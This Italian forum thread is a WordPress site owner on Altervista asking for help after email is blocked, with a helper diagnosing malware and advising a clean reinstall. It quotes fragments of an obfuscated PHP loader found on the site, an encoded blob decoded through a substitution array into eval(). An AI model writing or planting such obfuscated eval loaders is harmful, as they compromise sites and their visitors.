Problema con sito altervista + dominio

[travelsdiary]

Ciao,

Ho acquistato il dominio di altervista ma ho due problemi al sito:

1) Mi continua a bloccare le email dicendomi Traffico email temporaneamente bloccato. Mi potete dire qual'è il file infetto per favore?
Ho provato a disinstallare e reinstallare il tema e anche wordpress ma ancora mi blocca le email! Vi prego, ci sono dietro da diverse notti insonne.

2) Ho aggiornato wordpress alla nuova versione ma dal pannello di WP e mi è sparita l'associazione con altervista. Non c'è nulla, né relativo alla pubblicità né alle funzioni. Come si fa a ripristinare? Posso disinstallare WP e reinstallarlo dal pannello di altervista?

sito web: giramundo.it

Aiutattemi vi prego che non sto facendo altro che cercare di sistemare questi problemi e non ne vengofuori.. grazie :=)

[travelsdiary]

C'è nessuno?

Mi rivolgo soprattutto allo staff di Altervista.

Graziee!

[karl94]

Come hai effettuato l'aggiramento di preciso?

Solitamente un sito compromesso ha file del tipo search.php dentro la cartella /wp-includes/Text/. Sono file spesso cifrati e non di WordPress (grandi sempre uguali).
Assicurati inoltre di avere tutti i plugin e temi aggiornati, e di rimuovere quelli che non ti sono necessari.

[travelsdiary]

ciao,

si in effetti ho trovato un file strano..è tutto scritto così..

Codice:

xsOal3GNe3LNxsAK73stXMHfHCufl41ceODJjsHYqXudeT8EXID7FCuflGH38AQlHCWflCWflC'.
'WflCWflCWflCAKoiAEFCutFCANepyG81+jmVQlHCWflCWflCWflCWflCWflCA'.
'KoiAEFCutFCANepyG81+dUX1woi9Yo4pGhAZ324Zc7PSto3LNxsAK73sxDbNJlC'.
'AKoiAEVbZK73jd7wIflN1d7p1JUp1YxMhJlCAKoiAEVXuKUiAcxshajIaflCWflCWflCWflCWflCW'.
'fl4HYU4sflrifl41ceODJjsOYobLdeXjN23yYoGZ324Zc7PStA3Ld2AIfl4HYU4s4'.
'xsvYU4yYoGy0MZWflCWflCWflCWflCWflCW3e3Ld2AWJv1W324Zc7PStABTflrW324Zc7PStABT0MZWflCWflCWflCW'.

cosi via per mille righe..alla fine c'è scritto così..

Codice:

$mqayfuy = Array('1'=>'0', '0'=>'O', '3'=>'J', '2'=>'H', '5'=>'q', '4'=>'R', '7'=>'X', '6'=>'B', '9'=>'1', '8'=>'y', 'A'=>'k', 'C'=>'A', 'B'=>'x', 'E'=>'e', 'D'=>'z', 'G'=>'c', 'F'=>'S', 'I'=>'s', 'H'=>'i', 'K'=>'Y', 'J'=>'L', 'M'=>'w', 'L'=>'v', 'O'=>'l', 'N'=>'d', 'Q'=>'7', 'P'=>'M', 'S'=>'t', 'R'=>'r', 'U'=>'2', 'T'=>'F', 'W'=>'g', 'V'=>'U', 'Y'=>'b', 'X'=>'V', 'Z'=>'o', 'a'=>'K', 'c'=>'a', 'b'=>'N', 'e'=>'G', 'd'=>'Z', 'g'=>'D', 'f'=>'I', 'i'=>'9', 'h'=>'n', 'k'=>'8', 'j'=>'T', 'm'=>'E', 'l'=>'C', 'o'=>'m', 'n'=>'6', 'q'=>'3', 'p'=>'h', 's'=>'5', 'r'=>'4', 'u'=>'u', 't'=>'P', 'w'=>'Q', 'v'=>'j', 'y'=>'p', 'x'=>'W', 'z'=>'f');
eval(fu($v, $mqayfuy));?>

Come faccio a sapere se ci sono altri file così?

possibili che anche il database sia infetto?volevo caricarlo in un'altro server ma ho paura che sia infetto...

[karl94]

ciao,

si in effetti ho trovato un file strano..è tutto scritto così..

Codice:

xsOal3GNe3LNxsAK73...c7PStABT0MZWflCWflCWflCW'.

cosi via per mille righe..alla fine c'è scritto così..

Codice:

$mqayfuy = Arr...;?>

È codice offuscato, tipico di malware.

Come faccio a sapere se ci sono altri file così?

Con malware di questo tipo è altamente probabile che lo stesso abbia infettato altri script PHP e che ne abbia addirura creato in cartelle a caso, con nomi pseudo-plausibili.
Un metodo semplice e rapido per assicurarsi di rimuovere tutto è appunto cancellare tutto quanto dallo spazio web per poi effettuare una nuova installazione pulita.
Per non perdere i contenuti che hai adesso ti consiglierei di aprire temporaneamente un nuovo account AlterBlog e importare i contenuti lì, quindi convertire il tuo attuale account in AlterBlog (non è strettamente necessario, ma ci sono diversi vantaggi, leggi i pro e i contro prima dell'operazione) e infine importare nuovamente i contenuti dal blog di appoggio.
Una volta sistemato il tutto poi evita di installare plugin o temi di dubbia provenienza (al di fuori di quelli che trovi sul sito di WordPress): sono le principali fonti di compromissione. E tieni sempre tutto quanto aggiornato.

possibili che anche il database sia infetto?volevo caricarlo in un'altro server ma ho paura che sia infetto...

È molto difficile infettare un'installazione WordPress dal database, che io sappia l'unico modo è aggiungere utenze come amministratore, quindi controlla solamente la tabella degli utenti e per sicurezza cambia password.